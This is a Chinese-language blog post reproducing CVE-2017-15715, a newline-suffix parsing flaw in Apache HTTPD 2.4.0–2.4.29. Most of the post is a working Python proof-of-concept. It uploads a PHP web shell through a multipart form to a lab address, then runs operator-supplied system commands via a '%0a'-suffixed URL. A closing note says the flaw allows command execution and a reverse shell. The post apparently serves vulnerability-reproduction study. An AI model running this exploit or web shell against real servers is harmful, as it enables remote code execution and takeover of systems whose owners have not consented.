Posted in漏洞复现

CVE-2017-15715 Apache HTTPD 解析漏洞

No Comments
CVE-2017-15715 Apache HTTPD 解析漏洞

1.描述

  • Apache HTTPD 2.4.0~2.4.29
  • 一个解析漏洞

2.原理

  • 在解析PHP时,1.php\x0A将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略
  • 换行符%0a绕过文件上传

3.poc

  • poc.py
    • import requests

      url = “http://192.168.76.138:8080/”
      name = str(input(“Please input upload filename:”))
      hearders = {
         “Content-Type”: “multipart/form-data; boundary=—————————281340862315800489963965371984”
      }

      data=”’
      —————————–281340862315800489963965371984
      Content-Disposition: form-data; name=”file”; filename=”54321.php.jpg”
      Content-Type: application/x-shellscript

      <?php @system($_GET[“cmd”]);?>
      —————————–281340862315800489963965371984
      Content-Disposition: form-data; name=”name”

      {}.php

      —————————–281340862315800489963965371984–
      ”’

      res_post = requests.post(url=url,headers=hearders,data=data.format(name))
      res_post_status = int(res_post.status_code)

      if res_post_status == 200:
         u = “http://192.168.76.138:8080/{}.php%0a?cmd={}”
         cmd = str(input(“Please input CMD:”))
         res_get = requests.get(url=u.format(name,cmd))
         res_get_status = int(res_get.status_code)
         if res_get_status == 200:
             print(“Apache parse vul is exist!”)
             print(“[+] {}”.format(cmd))
             print(“[+] {}”.format(res_get.text))
         else:
             print(“Apache parse vul is not exist!”)

4.exp

  • 上传成功可以执行系统命令
  • 可以获得反弹shell
Tags:

Comments

No comments yet. Why don’t you start the discussion?

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

证明你是人: 0   +   6   =